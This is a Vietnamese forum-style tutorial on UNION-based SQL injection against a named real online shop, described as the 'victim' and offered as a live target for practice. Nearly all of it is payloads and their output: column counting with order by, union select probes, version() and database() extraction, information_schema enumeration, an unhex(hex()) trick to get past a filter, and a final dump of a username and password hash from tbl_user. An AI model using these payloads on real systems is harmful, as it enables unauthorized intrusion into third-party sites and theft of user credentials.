Victim : SHOP DINOKID ->> link còn nóng để thực hành bài Lab nhé ^^!giờ xem lỗi của nó nhé ^^! thêm dấu ( ' ) đằng sau =331 để xem nó có lỗi gì ko nhé ^^!tiếp theo nào ^^! bắt đầu tìm số column lỗi bằng order byorder by 1 ->> mở màn coi không có lỗi...order by 14 ->> vẫn thế thôi thì ta thử union select để xem lỗi cột chúng ta thử từ 0 -> tới cột 11 xem trong đó có lòi ra lỗi không nhé-331 union select 0,1,2,3,4,5,6,7,8,9,10,11ạc cái gì đây trời Phat hien co su tan cong!Viec tan cong nay da bi ngan chan va se duoc ghi nhan lai:***.81.**.*** - Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1mịa nóa kiểu này viết tut xong là tớ từ biệt anh em ( thôi cữ tiếp tục :x mặc kệ luôn )hình như ta union select sai ở đâu đó thử bỏ số 0 đi xem-331 union select 1,2,3,4,5,6,7,8,9,10,11ạc thử thêm 12,13,14 xem -311 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14chà lòi ra column lỗi ở số 3 roài :x tiếp tục nàoget info, version, database, users ở số 3 xem, ta xem version của nó nhé.-311 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14=> 5.0.92-communityra rùi get thử database nhé-331 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14=> shopdino_shopdbgiờ ta get table_name của nó nhé-331 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables-- -hiện số 3 là okta thử với câu lệnh :-331 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema like database()-- -lại được số 3ta thay số 3 = table_name nhé-311 union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema like database()-- -sạc lỗi, khó hiểu nhỉ :-/ta thử dùng lệnh unhex(hex()) xem sao-331 union select 1,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12,13 ,14 from information_schema.tables where table_schema like database()-- -ta đc => tbl_access-311 union select 1,2,unhex(hex(group_concat(column_name))),4,5,6,7, 8,9,10,11,12,13,14 from information_schema.columns where table_schema like database() and table_name like 'tbl_user'-- -=> id,uid,pwd ok lấy user/pass nào-331 union select 1,2,unhex(hex(group_concat(uid,0x7c,pwd))),4,5,6,7 ,8,9,10,11,12,13,14 from tbl_user-- -=> bephuong|c6df310058c108b9898d9a612c13ce8a hết Tut -> Chúc các bạn thành công